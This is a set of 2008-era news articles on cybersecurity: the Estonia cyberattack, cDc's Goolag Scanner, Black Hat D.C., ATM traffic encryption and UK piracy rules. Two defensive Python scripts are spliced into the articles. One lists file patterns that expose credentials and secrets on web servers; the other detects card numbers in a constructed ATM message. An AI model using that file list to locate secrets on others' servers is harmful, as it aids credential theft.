Last April, the former Soviet republic fell victim to a massive cyber attack after a row over a decision to relocate a statue of a Red Army soldier from downtown Tallinn, a move which infuriated the country's ethnic Russian minority. As riots ensued, Estonia's banks and government were paralysed by a massive barrage of spam and hacking: some merely mischievous, such as grafting a Hitler moustache onto prime minister Andrus Ansip's website photo, others potentially fatal, such as the hack which for a few minutes disabled the country's emergency services telephone number.

More frightening still, though, was the widespread suspicion that the Russian government - which had backed the protests - was involved, a theory given credence by the co-ordinated nature of the attacks and evidence that some of the sabotage techniques were well beyond the capabilities of ordinary hackers.

"They were intended to destabilise the government and create anxiety and fear," Estonia's defence minister, Jaak Aaviksoo, told The Sunday Telegraph last week. "It was a form of cyberterrorism."

Be the threat from Russia, al Qaeda or a James Bond-style criminal mastermind, Estonia believes that what happened to it last year should be a wake-up call for the rest of the Western world, where growing dependence on technology also brings growing vulnerability. The country is uniquely well qualified to comment. Not only has it had real experience of such an attack, it is also one of the most advanced e-societies in the world, having rebuilt its rusting Soviet-era infrastructure virtually from scratch.

In Tallinn, a mixture of gleaming new high-rise blocks and cobbled medieval streets, nearly every transaction in life can be done electronically, from e-voting in elections through to paying parking tickets and receiving exam results by SMS text message. Many Estonians nowadays carry barely any cash, paying even for a cup of coffee with an online credit card.

Thanks partly to a formidable array of home-grown computer experts like Mr Samuel, the country managed to fend off the worst of April's cyberattack. Now, though, the Estonian government is extending its expertise internationally, by converting a Tsarist-era military barracks in Tallinn into the first-ever international cyberdefence school for NATO, which it infuriated Russia by joining in 2004. Staffed by around 30 cyberexperts from NATO member states, it will become fully operational later this year.

"Last year's attack was a dangerous violation of our way of life, where we have tried to create a more effective society through automating the flow of information," said Lieutenant General Johannes Kert, until recently Estonia's NATO attache. "The centre isn't just to collect Estonian know-how, but to collect the larger know-how and focus it to the needs of NATO."

Nestling between birch trees as silver as the Baltic winter sky, the squat, Soviet-era brick sentry house that guards the complex - known as "K5" in the Estonian military - looks like just another relic from the Cold War. But inside the barracks, Lt Gen Kert, who started his career in a Soviet armoured unit, is helping co-ordinate military exercises for a much more modern struggle - where the threats may involve not just tanks and missiles, but also the likes of "botnets" - networks of computers that are hijacked in huge numbers by clandestine viruses and then used, robot-like, to launch attacks on a country's infrastructure from within.

Also known as "zombie armies", they are alarmingly easy to recruit thanks to new developments in software. A clever hacker need do little more than plant a piece of hidden code on a commonly-used website, after which they can "hijack" any computer that visits it. It is thought an estimated million botnet computers were illegally harnessed for the assault on Estonia last year, many of them belonging to ordinary PC users in America, Britain and other countries who remained blissfully ignorant of the fact.

In criminal hands, botnets can assist with the mass hacking of people's bank accounts, by remotely monitoring which websites the user visits and then using a "keystroke logger" to work out PIN codes and passwords typed on the keyboard. In a hostile government's hands, however, they can be the equivalent of infiltrating a neighbouring country with millions of undercover "cybersoldiers", unleashing them whenever required.

"In the case of weapons systems that are designed to defend countries, you really don't want your adversary to get hold of the command and control systems," said Kenneth Geers, an American cyberdefence specialist on secondment to the NATO school from the US Naval Criminal Investigative Service. While most governments have special security-encrypted software for military use, he warns, there remains the possibility of a "Cyber 9-11" through attacks on civilian infrastructure.

"I don't think we have seen the worst of what can happen in cyberspace yet," he said. "We wouldn't see the end of the world by a long shot, but that doesn't mean that vital national and critical infrastructure could not be affected."

The convenience which the internet brings to so many walks of life, he says, applies to the world of cyberterrorism and cybercrime too. The last two years have seen the internet spawn an entire new criminal economy in so-called "malware", software specifically designed for malevolent activities like stealing credit card numbers and secure passwords.

According to Peeter Marvet, another leading Estonian cyberanalyst, many "malware" hackers now sell bespoke products online, also offering 24-7 "techie help" in case it goes wrong, making cybercrime an option not just for computer experts but for criminals and terrorists too. "It is like ordering a suit," said Mr Marvet. "You can buy the toolkits, the software, the service contracts to do whatever you want, say like capturing 80,000 computers to attack a bank."

One such example was the Gozi Trojan, which steals data and sends it to hackers in an encrypted form, sold for around £500 a time by a shadowy consortium of St Petersburg-based cybergangsters called the Russian Business Network. Run by a shadowy individual nicknamed Flyman, the network also offered "bulletproof" hosting for cybercrime groups to keep their operations safe from whitehat hackers.

Flyman, who mysteriously vanished from the internet late last year, is just one of many expert Russian hackers, who, along with the Chinese, are widely considered to be among the best in the business. That has prompted speculation that they may also have backing - tacit or otherwise - from their own countries' intelligence services, who view them as a useful - and deniable - means of probing other countries' internet security.

Whether the Kremlin really was involved in the attack on Estonia last year remains a mystery. Mr Aaviksoo concedes that in virtual reality, no "smoking gun" is left behind, but points out that afterwards, the Russian government declined Estonia's requests to investigate the many Russian-based internet sites involved in the attacks. "I am not sure that the willingness to co-operate was higher than in the case of (Alexander) Litvinenko," he said, referring to Russia's refusal to extradite the man accused of poisoning the former spy in London.

In the meantime, though, the more pressing question is not who did the last attack, but what may they be capable of next time. "It wasn't an all-out assault, rather than a testing and probing to see how we responded," said Mr Marvet. "We have learned from it, but whoever did it will have learned too."


Google-Powered Hacking Makes Search A Threat

A hacker group has released Goolag Scanner, a tool that scans Web sites for vulnerabilities.

Over the past few years, cybersecurity professionals have watched as the cinematic cliche of police with pistols being outgunned by thieves with automatic weapons has become applicable to their industry. Increasingly, they find themselves defending against automated attacks that can easily overwhelm the technologically underequipped.

Wednesday saw the debut of the latest such tool, which derives its power from Google (NSDQ: GOOG)'s vast index. That's when the Cult of the Dead Cow, the self-proclaimed "world's most attractive hacker group," released a Web auditing tool called Goolag Scanner.

"It's no big secret that the Web is the platform," said cDc official Oxblood Ruffin, in a statement. "And this platform pretty much sucks from a security perspective. Goolag Scanner provides one more tool for Web site owners to patch up their online properties. We've seen some pretty scary holes through random tests with the scanner in North America, Europe, and the Middle East. If I were a government, a large corporation, or anyone with a large Web site, I'd be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious."

To prove that point, Ruffin provided InformationWeek with a list of 11 high-profile U.S. government agency and lab Web sites that had been scanned and found to have what appear to be significant security holes, including satellite access codes, credentials for VPNs and routers, and open proxies. He asked that the information not be published, as the group's intent is not to embarrass government officials or encourage attempts to hack government systems.

The Department of Homeland Security, which Ruffin several weeks ago said was notified of the flaws, did not respond to a request for comment.

Goolag Scanner presently exists only as a Windows application, though it is being ported to other platforms. It allows the user to quickly scan Google's index for files on Web sites that may reveal security vulnerabilities. For example, Goolag Scanner allows you to search Web sites for a file called "unattend.txt," which is used to drive unattended Microsoft Windows installations. The file may include information useful to hackers, such as administrator passwords.

Goolag Scanner doesn't do anything a hacker or penetration tester couldn't do by typing text into Google and using certain operator commands to constrain the search to a specific domain or file type. But it makes searching for holes much easier.
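The flip side of search-driven auditing is checking your own web root for the kinds of files those queries look for before a search engine indexes them. The script below is an added example written for this page, not part of Goolag Scanner or cDc's work; the filename patterns and the sample site layout are constructed, with "unattend.txt" taken from the text above, and the simplified robots.txt parser only honours the `User-agent: *` group.

```python
import fnmatch
import os

# Constructed sample of filename patterns of the kind Google-hacking queries
# target. Only "unattend.txt" comes from the article; the rest are assumptions.
SENSITIVE_PATTERNS = {
    "unattend.txt": "unattended Windows setup file, may hold admin passwords",
    "*.bak": "backup copy, often of a config or script containing secrets",
    "*.sql": "database dump",
    ".htpasswd": "web server credential file",
    "*.pem": "private key or certificate material",
    ".env": "environment file with API keys",
}


def classify_path(rel_path):
    """Return the reason a file is sensitive, or None if it matches nothing."""
    name = os.path.basename(rel_path).lower()
    for pattern, reason in SENSITIVE_PATTERNS.items():
        if fnmatch.fnmatch(name, pattern):
            return reason
    return None


def parse_disallows(robots_txt):
    """Collect Disallow prefixes from the 'User-agent: *' group of a robots.txt."""
    prefixes, applies = [], False
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            applies = value == "*"
        elif key == "disallow" and applies and value:
            prefixes.append(value)
    return prefixes


def audit_paths(rel_paths, robots_txt=""):
    """Flag sensitive files and note whether robots.txt already blocks crawling.
    A Disallow only asks well-behaved crawlers to skip the path; removing the
    file (or access-controlling it) is the real fix."""
    disallowed = parse_disallows(robots_txt)
    findings = []
    for rel in rel_paths:
        reason = classify_path(rel)
        if reason is None:
            continue
        url_path = "/" + rel.replace(os.sep, "/")
        blocked = any(url_path.startswith(d) for d in disallowed)
        findings.append({"path": url_path, "reason": reason, "crawl_blocked": blocked})
    return findings


def audit_webroot(root, robots_txt=""):
    """Walk a local web root directory and audit every file under it."""
    rel_paths = [os.path.relpath(os.path.join(d, f), root)
                 for d, _, files in os.walk(root) for f in files]
    return audit_paths(sorted(rel_paths), robots_txt)
```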

"The Goolag Scan tool isn't especially innovative in terms of the methods it implements," said Mark Kraynak, senior director of strategic marketing for data protection company Imperva, in an e-mail. "These techniques have been well known in the security community for some time."

What it does do, Kraynak said, is allow less-sophisticated attackers to exploit application and data layer vulnerabilities. "This will result in even more application attacks," he said. "This is bad news, since SQL Injection and Cross-Site Scripting already rank among the most common attacks lodged against online applications. ... The bad guys now have automatic weapons, so as a security community we need to upgrade our defense systems for these new threats."

What that means, in addition to addressing specific vulnerabilities, is defending against search.

As Petko D. Petkov, founder of security consulting firm GnuCitizen, explained in a blog post on Friday, search engines can be used very efficiently to collect information about vulnerabilities, particularly metadata that isn't ordinarily indexed.

Petkov proposes using the Amazon (NSDQ: AMZN) Web Services platform to build a custom search application for identifying vulnerabilities. "By using Amazon's Services and more specifically their Elastic [Compute] Cloud infrastructure, attackers can gain immense scalability, which they can use for their own evil good," he explained. "The cloud allows developers to spawn virtualized instances of any type of operating system, which can be instructed to go through any kind of heavy machine processing task, such as crawling Web sites, port-scanning, etc. The information can be stored on Amazon's Simple Storage Service. The whole package is quite cheap and very affordable."

But for the organization that gets hacked, the expense could be considerable.


Black Hat D.C. wraps up

Breaking things--that's what the very bright and super curious do; they look beyond the obvious to see what's truly lurking beneath the surface. On Wednesday and Thursday, attendees at Black Hat D.C. 2008 got a window into the latest research being done on Web applications, wireless, and embedded technologies.

On Wednesday, researchers David Hulton and "Steve" showed how, with about $1,000 worth of equipment, they can decrypt A5/1 cellular GSM traffic in less than an hour. Following that, Adam Laurie reprised his popular RFIDiots talk from last year's Black Hat briefings with a new program that allows him to read the data off smart credit cards "hands free."

Perhaps the best new presentation at Black Hat D.C. 2008 took place in the early afternoon. In "Bad sushi: Beating phishers at their own game" researchers Nitesh Dhanjani and Billy Rios relentlessly tracked down the origins of several online phishing sites to reveal, not super-smart ninja hackers, but sloppy coders who cut and paste and even steal from one another. Following that, David Litchfield, a substitute for a canceled talk on VoIP, presented on new Oracle vulnerabilities. Finishing the day was Neal Krawetz, who expanded his talk from Black Hat Las Vegas on image analysis, this time including his research into the veracity of Osama bin Laden's beard in a recent video.

Wednesday night included a social. There was also a speaker from the Washington, D.C.-based Spy Museum with stories of real-life spies.

On Thursday, Tiller Beauchamp and David Weston gave a presentation on DTrace, a security research application that is now available within Mac OS X Leopard and coming soon to various distributions of Linux. Following that, Zac Franklin reprised his previous talk on biometric and token-based access control systems with new information on work access cards. After lunch, talks included Chris Wysopal on classification and detection of backdoors, Jason Larson on SCADA security, and Jon Oberheide on exploiting virtual machine migrations.


Banks failing on ATM security

Banks and financial institutions are leaving customers' personal details vulnerable to hackers by failing properly to secure their ATMs, according to a new report.

Managed security firm Network Box cited three main threats to ATMs: IP worms, disruption of the IP network and denial of service, and the harvesting of transaction data for malicious purposes.

The company said that ATM security risks have increased because of the changing ways in which they operate.

Many ATMs were built on proprietary hardware, software and communications protocols.

But it is estimated that 70 per cent of current ATMs are based on PC/Intel hardware and commodity operating systems using standard IP networking with some additional peripherals housed in a secure vault-like box.

The report attributes the changes to advantages in cost, performance, flexibility, standardisation and functionality, but points out that these advantages bring increased threats.

In these newer systems the ATM is connected to the payment processor using a TCP/IP connection. However, while the Pin is triple-DES encrypted, the messages themselves are not.

This leaves card numbers, expiry dates, transaction amounts and account balances clearly readable.

A hacker needs only to access some part of the IP network between the IP-ATM and the payment processor to gather the details.
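Because only the PIN block is encrypted, the simplest check a bank can run on its own ATM link is to look for Luhn-valid card numbers sitting in clear in the payload. The detector below is an added example for this page, not code from Network Box or its report; the message layout and the card number are constructed, and the PIN block is shown as a hex placeholder standing in for the triple-DES ciphertext.

```python
import re

# Constructed sample of what a passive observer on the IP link between an
# IP-based ATM and the payment processor might see. Field layout is assumed;
# PINBLK stands in for the triple-DES-encrypted PIN block.
CAPTURED_ATM_MESSAGE = (
    "MTI=0200|PAN=4539578763621486|EXP=0912|AMT=000000020000|"
    "BAL=000000153012|PINBLK=9A3F0C77E21B4D58|TERM=ATM00417"
)

# Payment card numbers are 13 to 19 digits; require digit boundaries so that a
# longer numeric field is not sliced into a false match.
PAN_RE = re.compile(r"(?<!\d)(\d{13,19})(?!\d)")


def luhn_valid(digits):
    """Luhn checksum used by payment card numbers (weeds out amounts/IDs)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_cleartext_pans(payload):
    """Return card numbers readable in clear in a captured payload."""
    return [m.group(1) for m in PAN_RE.finditer(payload) if luhn_valid(m.group(1))]


def mask_pan(pan):
    """Keep only the first six and last four digits for the alert record."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def audit_link(payload):
    """Judge a single message: a fully encrypted link exposes no PAN at all.
    Returns masked values only, so the alert itself does not leak card data."""
    pans = find_cleartext_pans(payload)
    return {"encrypted_link": not pans, "pans_masked": [mask_pan(p) for p in pans]}
```

Run over a sample of frames from a span port on the ATM segment, any non-empty `pans_masked` list shows the transaction body is travelling unencrypted, which is exactly the gap the report describes.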

"Most people simply assume that because an ATM is invariably provided by a bank, the transactions and the data being transmitted must be secure," said Mark Webb-Johnson, chief technology officer at Network Box.

"We have already seen how the Nachi worm crossed over into 'secure' networks and infected ATMs for two financial institutions, and SQL Slammer indirectly shut down 13,000 Bank of America ATMs.

"If banks do not use technology that can provide an effective level of protection it is very likely that more high-profile attacks will follow."

Network Box recommends that all traffic to and from ATM machines should be encrypted, and not just the Pin.

ATM networks should also be separated from the rest of the bank's network, thereby allowing it to be closely monitored and controlled.

* Network Box Report: IP-ATM Security


ISPs could face piracy sanctions

Internet service providers must take concrete steps to curb illegal downloads or face legal sanctions, the government has said.

The proposal is aimed at tackling the estimated 6m UK broadband users who download files illegally every year.

The culture secretary said consultation would begin in spring and legislation could be implemented "by April 2009".

Representatives of the recording industry, who blame piracy for a slump in sales, welcomed the proposals.

"ISPs are in a unique position to make a difference and in doing so to reverse a culture of creation-without-reward that has proved so damaging to the whole music community over the last few years," said John Kennedy, head of the International Federation of the Phonographic Industry (IFPI).

A spokesperson for the Internet Service Providers' Association (ISPA) said that creating appropriate legislation would be very difficult.

"Any scheme has got to be legal, workable and economically sustainable," the spokesperson told BBC News.

He also said that ISPs were already pursuing self-regulation, which was the government's preferred route.

Privacy issue

"The government has no burning desire to legislate," Andy Burnham, culture secretary, told the Financial Times.

However, he said that the proposals signalled "a change of tone from the government".

Its intentions are outlined in a creative industries strategy paper called Creative Britain: New Talents for the New Economy.

The document is a broad ranging paper that sets out government support for the creative industries.

The document commits the government to consulting on anti-piracy legislation this spring "with a view to implementing it by April 2009", according to the FT.

"We're saying we'll consult on legislation, recognising there are practical questions and legitimate issues," Mr Burnham told the paper.

In particular, any legislation would have to take account of the 2002 E-Commerce Regulations that define net firms as "conduits" which are not responsible for the contents of the traffic flowing across their networks.

European laws on online privacy could also create problems for any new legislation.

Earlier this year it was reported that the government was considering, in the report, a "three strikes" approach to tackling persistent offenders.

But Mr Burnham denied this was the case and told the FT that the strategy had "never been in the paper".

If the government goes ahead, the UK would be one of the first countries to impose sanctions.

"This is a sea-change in attitude and I believe it is now up to governments elsewhere in Europe and further afield to follow their example," said Mr Kennedy.


cDc automates Google Hacking

Infamous hacking group the Cult of the Dead Cow (cDc) has published a tool that searches for vulnerabilities and private data using carefully-selected Google search queries.

The process of so-called Google hacking is already well known, largely due to the efforts of Johnny "I Hack Stuff" Long, whose presentations on the subject have become a fixture of conferences such as Black Hat. cDc's Goolag Scan allows unskilled hackers or the simply curious to use the same techniques.

cDc is most famous for creating Back Orifice remote administration/back door package for Windows ten years ago. It describes Goolag Scanner as a web auditing tool, allowing users to check their own website for vulnerabilities. Searches can be restricted to an individual domain or extended to an entire top-level domain as desired.

There's nothing in the Windows-based application to stop hackers using the tool, a feature it shares with other utilities and one which makes value judgements about dual-use hacking/auditing tools a tricky business.

Goolag Scan provides 1,500 pre-configured Google search queries in categories such as "vulnerable servers", "sensitive online shopping information" and "files containing juicy information", Heise Security reports. The tool presents its findings in the form of a list of URLs that can be opened directly in a browser.
